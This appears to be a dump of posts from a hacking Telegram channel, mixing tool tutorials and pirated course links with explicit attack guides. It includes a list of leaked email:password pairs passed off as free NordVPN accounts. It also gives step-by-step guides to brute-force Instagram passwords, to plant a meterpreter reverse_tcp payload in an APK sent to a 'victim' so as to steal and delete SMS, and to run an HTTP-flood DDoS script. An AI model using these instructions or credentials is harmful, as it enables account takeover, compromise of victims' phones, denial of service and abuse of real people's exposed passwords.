▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑How to generate fake traffic using
Traffic generator ?

A simple python script that generates random HTTP/DNS traffic noise in the background while you go about your regular web browsing, to make your web traffic data less valuable for selling and for extra obscurity.

1) Install requests if you do not have it already installed, using pip:

> pip install requests

2) Clone the repository

> git clone https://github.com/1tayH/noisy.git
Navigate into the noisy directory

3) cd noisy
Run the script

4) python noisy.py --config config.json

5) The program can accept a number of command line arguments:

$ python noisy.py --help
usage: noisy.py -h --log -l --config -c --timeout -t

🦑Commands :

-h, --help show this help message and exit
--log -l logging level
--config -c config file
--timeout -t for how long the crawler should be running, in seconds

🦑Build Using Docker

1) Build the image
docker build -t noisy .

Or if you'd like to build it for a Raspberry Pi (running Raspbian stretch):

2) docker build -f Dockerfile.pi -t noisy .

Create the container and run:

3) docker run -it noisy --config config.json

✅Verified by Undercode on

- Ubuntu

E N J O Y ❤️👍🏻
git topic
@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

Finding the Balance Between Speed & Accuracy During an Internet-wide Port Scanning #full #requested

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑https encryption is also cracked HEIST attack to obtain plaintext from encrypted data :

1) WHAT IS The TCP-Windows protocol ?


The TCP-Windows protocol is also called TCP Receive Window. It is a buffer on both ends of a TCP connection for temporarily saving incoming data. The data in this buffer will be sent to the application to make room for new incoming data. If the buffer is full, the data receiver will warn the sender that it cannot receive more data before the buffer is emptied. There are some details involved, but they are all very basic things. Generally, the device will notify the other party of the current size of its TCPWindows in the TCP Header information.

2) C O N D I T I O N S :

The conditions for the use of the HEIST attack are very simple, requiring only a few lines of simple javascript code, and no man-in-the-middle attack is required. First, the transmitted sensitive data will be captured and saved. This attack method can obtain private sensitive information such as bank card number, real name, phone number, and social security number. But as we all know, most of these data are encrypted by HTTPS. Then make a probe on the size and length of the encrypted data. Many websites use file compression technology to improve the loading speed of web pages, and attackers can just use the design flaws to decrypt the data payload (similar to BREACH attacks and CRIME attacks).

3) HEIST technology can use new APIs (Resource Timing and Fetch) to calculate the number of transmission frames and windows sent by the target host. Throughout the process, researchers can use a piece of JavaScript code to determine the actual size of the HTTPS response message. Then, the malicious HEIST code can cooperate with the BREACH technology to extract the encrypted information from the user's request data.

@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑so hepful top google chrome plugins 2020 :

https://chrome.google.com/webstore/detail/tab-wrangler/egnjhciaieeiiohknchakcodbpgjnchh?hl=en

https://chrome.google.com/webstore/detail/the-great-suspender/klbibkeccnjlkjkiokjodocebajanakg?hl=en

https://chrome.google.com/webstore/detail/foxclocks/obcbigljfpgappaaofailjjoabiikckk?hl=en

https://chrome.google.com/webstore/detail/lastpass-free-password-ma/hdokiejnpimakedhajhdlcegeplioahd

https://chrome.google.com/webstore/detail/evernote-web-clipper/pioclpoplcdbaefihamjohnefbikjilc?hl=en

https://chrome.google.com/webstore/detail/ghostery-%E2%80%93-privacy-ad-blo/mlomiejdfkolichcflejclcbmpeaniij?hl=en

https://chrome.google.com/webstore/detail/adblock-plus-free-ad-bloc/cfhdojbkjhnklbpkdaibdccddilifddb

https://chrome.google.com/webstore/detail/hover-zoom%2B/pccckmaobkjjboncdfnnofkonhgpceea?hl=en

https://chrome.google.com/webstore/detail/panicbutton/faminaibgiklngmfpfbhmokfmnglamcm?hl=en

https://chrome.google.com/webstore/detail/user-agent-switcher-for-c/djflhoibgkdhkhhcedjiklpkjnoahfmg

https://chrome.google.com/webstore/detail/evernote-web-clipper/pioclpoplcdbaefihamjohnefbikjilc?hl=en

enjoy ❤️👍🏻
@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑TOP 202 FIREFOX PLUGINS- HELPFUL :

https://addons.mozilla.org/en-US/firefox/addon/adblock-plus/

https://addons.mozilla.org/en-US/firefox/addon/ghostery/

https://addons.mozilla.org/en-US/firefox/addon/ublock-origin/

https://addons.mozilla.org/en-US/firefox/addon/greasemonkey/

https://addons.mozilla.org/en-US/firefox/addon/lightshot/

https://addons.mozilla.org/en-US/firefox/addon/umatrix/

https://addons.mozilla.org/en-US/firefox/addon/darkreader/

https://addons.mozilla.org/en-US/firefox/addon/clippings/

https://addons.mozilla.org/en-US/firefox/addon/
grammarly-1/

https://addons.mozilla.org/en-US/firefox/addon/videospeed/

https://addons.mozilla.org/en-US/firefox/addon/tabliss/

https://addons.mozilla.org/en-US/firefox/addon/gesturefy/

https://addons.mozilla.org/en-US/firefox/addon/bitwarden-password-manager/

https://addons.mozilla.org/en-US/firefox/addon/image-search-options/

https://addons.mozilla.org/en-US/firefox/addon/cookie-autodelete/

https://addons.mozilla.org/en-US/firefox/addon/export-tabs-urls-and-titles/

https://addons.mozilla.org/en-US/firefox/addon/smart-referer/

enjoy ❤️👍🏻
@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

Windows for Pentester_ Certutil

-What is certutil? What is Living off Land? -Working with certutil?
- What is Alternative Data Stream (ADS)?

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑2020 Topic Hacking :

F E A T U R E S :

-Subdomains monitoring: put data to Discord, Slack or Telegram

-webhooks. See Subdomains Monitoring for more information.

-Multi-thread support for API querying, it makes that the maximun time that Findomain will take to search subdomains for any target is 15 seconds (in case of API's timeout).

-Parallel support for subdomains resolution, in good network conditions can resolv about 3.5k of subdomains per minute.
DNS over TLS support.

-Specific IPv4 or IPv6 query support.

-Discover subdomains without brute-force, it tool uses Certificate

-Transparency Logs and APIs.

-Discover only resolved subdomains.

-Discover subdomains IP for data analisis.

-Read target from user argument (-t) or file (-f).

-Write to one unique output file specified by the user all or only resolved subdomains.

-Write results to automatically named TXT output file(s).

-Hability to query directly the Findomain database created with
Subdomains Monitoring for previous discovered subdomains.

-Hability to import and work data discovered by other tools.

-Quiet mode to run it silently.

-Cross platform support: Any platform, it's written in Rust and Rust is multiplatform. See the documentation for instructions.

-Multiple API support.

-Possibility to use as subdomain resolver.

-Subdomain wildcard detection for accurate results.

-Support for subdomain discover using bruteforce method.

-Support for configuration file in TOML, JSON, HJSON, INI or YAML format.

-Custom DNS IP addresses for fast subdomains resolving (more than 60 per second by default, adjustable using the --threads option.

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1) $ git clone https://github.com/Edu4rdSHL/findomain.git -b develop # Only the develop branch is needed

2) $ cd findomain

3) $ cargo build --release

4) $ ./target/release/findomain

5) for linux

> $ chmod +x findomain-linux

> $ ./findomain-linux

C O M P A T I B I L I T Y :

Linux
Windows
MacOS
Aarch64 (Raspberry Pi)
NixOS
Docker

MORE TUTORIALS https://asciinema.org/a/3kHnCYTDsOp20ttgNXXgvCRjX

E N J O Y ❤️👍🏻
@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑The Complete Guide (incl. Vue Router & Vuex)

https://www.udemy.com/course/vuejs-2-the-complete-guide/

https://drive.google.com/drive/folders/1ch7_az37oXzMbznqXGYhjTg3JlBthbIb

🦑NEW NORDVPN PREMIUM :

janetthornhill@aol.com:Somerset1 | Expiration = 2020-08-19 17:56:55
japurcell@aol.com:Rnixon12 | Expiration = 2022-01-17 01:39:03
jaredkahl22@gmail.com:Kahl4ever | Expiration = 2022-04-25 03:04:17
jasonaust02@gmail.com:Ja062895 | Expiration = 2020-08-09 23:17:05
jasonmpeters@live.com:Crfhonda08 | Expiration = 2020-10-14 00:00:00
jasonstevenson1984@gmail.com:Wesley8372 | Expiration = 2020-09-23 21:20:04
jasperkibzey@gmail.com:trueblue24 | Expiration = 2022-10-08 20:35:16
jasrasmussen@gmail.com:Joshua88 | Expiration = 2022-05-02 18:28:08
jaycobtharp@gmail.com:4Jaycob4 | Expiration = 2021-07-15 16:41:31
jayhill_jeromehill@yahoo.com:dragonballz | Expiration = 2020-11-20 01:53:06
jessonmoen@gmail.com:Surfer22 | Expiration = 2021-04-15 19:23:39
jessshankland@googlemail.com:jess3107 | Expiration = 2020-08-03 11:46:05
jessyc09@yahoo.com:ladybug05 | Expiration = 2022-03-09 23:31:28
jessylivingstone@rogers.com:bazooka123 | Expiration = 2020-12-03 07:47:03
jesusjrsanchez17@gmail.com:pandaskill4fun | Expiration = 2023-03-04 09:20:16
jf3333@yahoo.com:6382joel | Expiration = 2020-10-01 14:12:54
jim1.west@comcast.net:Nathan2@ | Expiration = 2021-11-23 22:40:42
jimandamita@mac.com:daswamy1 | Expiration = 2025-01-31 17:43:50
jimenez.michael@live.com:Suckit02!x | Expiration = 2021-11-23 01:10:14
jjfiore@aol.com:Alana124 | Expiration = 2021-01-05 02:28:56
jjsrabbit@yahoo.com:redsox0987 | Expiration = 2020-08-08 02:47:24
jkuipers2017@fau.edu:Boodlebag311 | Expiration = 2020-08-22 22:35:09
jlaicans@yahoo.com:ytellu911 | Expiration = 2020-08-21 16:26:59
jlouns@hotmail.com:Culloden1746 | Expiration = 2022-09-26 03:34:20
jm-perez@att.net:Zerg1122 | Expiration = 2022-08-18 22:34:22
jmc66@mac.com:Scotland66! | Expiration = 2022-04-04 19:19:21
jmdesena@att.net:Duke1225! | Expiration = 2020-09-22 17:14:13

24/24 posts enjoy & share us ❤️👍🏻

t.me/UndercodeSecurity

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Sniffer may cause harm:

1) The sniffer can capture passwords

2) It can capture private or confidential information

3) It can be used to compromise the security of network neighbors, or to obtain higher-level access rights.

> In fact, If you have an unauthorized sniffer on the network, you think your system has been exposed to others. (You can try the sniffing function of Skyline 2)

4) Generally, we only sniff the first 200 to 300 bytes of each message. The username and password are included in this part, which is the real part we care about. Workers can also sniff all the packets on a given interface. If there is enough space for storage and enough for processing, they will find other very interesting things...

@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Docker and Containers - The Big Picture

https://mega.nz/folder/749RBJ4S#-6h97nOrmAnlqxHFn0gU1g

1. Course Overview
https://mega.nz/folder/K88nTJ4Y#_KoGCfVxv_6IK6eFLW8KSA

2. Course Introduction
https://mega.nz/folder/us8RRD5R#DpM4u_wKZYHJDs1nSpaiXQ

3. What Are Containers
https://mega.nz/folder/CglhHRbD#tbZa54LXwj40TM5ABuuRmg

4. What Is Docker
https://mega.nz/folder/Gps33JpR#uCgIwQzYXkgKu21u27G1MA

5. Preparing to Thrive in a Container World
https://mega.nz/folder/P50zUTzB#8lE9hanD3cByG2GkF5GJVw

6. What Kind of Work Will Containers Do
https://mega.nz/folder/D5lFCb5S#RDxkdcvUx5NdvAB-y3ERMQ

7. Docker Hub and Other Container Registries
https://mega.nz/folder/HslnGBJb#rALtcam1oqfby02VfZ6qgw

8. Are Docker and Containers Ready for Production and the Enterprise
https://mega.nz/folder/Wptz1TjR#SFcuoUFMDuXjmUnt3kiCtw

9. What Is Container Orchestration All About
https://mega.nz/folder/yw93RDKB#peOF36YxUT6UQglyQ5d1cg

10. What Next
https://mega.nz/folder/m8lz0BRC#HfhgpjFFYTkJcuEoJnJI7A

someone ask about phishing facebook via termux no root #requested

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑HACK INSTAGRAM WITH LINUX OS :

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1) git clone https://github.com/Ethical-H4CK3R/Instagram.git

2) chmod -R 755 Instagram && cd Instagram

3) python instagram.py

4)get any wordlist example :

> > https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm

> http://www.insidepro.team/

> https://wiki.skullsecurity.org/Passwords

> https://github.com/danielmiessler/SecLists/tree/master/Passwords

> https://github.com/berzerk0/Probable-Wordlists

> https://github.com/topics/password-cracking

(up to 12 Gb wordlists)

5) install Tor with: sudo apt-get install tor

6) python instagram.py Username wordlist.txt

E N J O Y ❤️👍🏻
@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑HACK WHATSAPP VIA LINUX-PARROT/KALI/UBUNTU :

A ) Install requirements :

1) apt-get install lib32stdc++6 lib32ncurses5 lib32z1

2) git clone https://github.com/SkullTech/apk-payload-injector

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

3) choose the APK PAYLOAD - recommended any cleaner apk

4) make sure to place both of the apk and the script you downloaded earlier in the same directory

5)type in terminal :

> ruby apk-embed-payload.rb cleanerapk.apk -p android/meterpreter/reverse_tcp LHOST=xxx.xxx.x.xxx LPORT=xxxx

6)now type :
> msfconsole

7) type in terminal :

> use multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST {local ip to listen on}
set LPORT {the port you set earlier}
exploit

8) now send the apk to the victim :))

9) after installing ——->> use the command drop_sms

10) recommended :
root the phone and simply spoof the MAC adress using a terminal, download from playstore like termux


11) to delet the android sms db use this command :

> delete data/data/com.android.providers.telephony/databases/mmssms.db

E N J O Y ❤️👍🏻
written by @medusaU
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑TOP TWITTER HACKING 2020 :
windows-linux

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1) sudo apt install python-pip python-dev build-essential python2.7-dev python-pyexiv2 python-openssl

2) sudo pip install --upgrade pip

3) sudo pip install --upgrade virtualenv

4) sudo pip install --upgrade tweepy

5) sudo pip install --upgrade pillow

6) sudo pip install --upgrade exifread

7) sudo pip install --upgrade jinja2

8) sudo pip install --upgrade oauth2

9)download or clone https://github.com/vaguileradiaz/tinfoleak

10) Edit "tinfoleak.conf"

11) Use your favorite editor ;-)

12) Give value to these variables:
CONSUMER_KEY
CONSUMER_SECRET
ACCESS_TOKEN
ACCESS_TOKEN_SECRET

13) How to obtain these values:
https://developer.twitter.com/en/docs/basics/authentication/guides/access-tokens
Save "tinfoleak.conf"
Execute "tinfoleak.py"

E N J O Y ❤️👍🏻
U S E F O R L E A R N
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Docker new course for beginers:

https://mega.nz/folder/So9GiKrb#q8nkZTlY9Opufm4vccka8g

1. Course Overview
https://mega.nz/folder/H0tmFKzK#QpOycCUVMRlNOKVE_hP9JQ

2. Course Introduction
https://mega.nz/folder/ellQgYwR#1yOb1trBpNONRtIYza4YFw

3. Installing Docker
https://mega.nz/folder/WplUCAoL#nnCIed1eBpdlFhueaVS6ww

4. Working with Containers
https://mega.nz/folder/C4sClCgb#y1edN8-1diDWDBJbSO5y5w

5. Swarm Mode and Microservices
https://mega.nz/folder/Dw1wXQxY#O7UuKzrErXcdWnsX2uVgTw

6. What Next!
https://mega.nz/folder/j9tmzCZD#vc03qASG0aOs72o21y2uyw

E N J O Y ❤️👍🏻

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑HTTP-FLOOD TOPIC (TERMUX/LINUX)
Wreckuests is a script, which allows you to run DDoS attacks with HTTP-flood(GET/POST). It's written in pure Python and uses proxy-servers as "bots". OF COURSE, this script is not universal and you can't just drop Pentagon/NSA/whatever website with just a single mouse click. Each attack is unique, and for each website you'd need to search for vulnerabilities and exult them.

F E T U R E S :

-Cache bypass with URL parameters randomization
-CloudFlare detection and notification of
-Automatic gzip/deflate toggling
-HTTP Authentication bypass
-UserAgent substitution
-Referers randomizer
-HTTP proxy support

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1) https://github.com/JamesJGoodwin/wreckuests.GIT

2) chmod +x install.sh

3) ./install.sh

REQUIRE ROOT FOR TERMUX USERS

4) python3 wreckuests.py -v <target url> -a <login:pass> -t <timeout>

E N J O Y ❤️👍🏻
U S E F O R L E A R N
@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁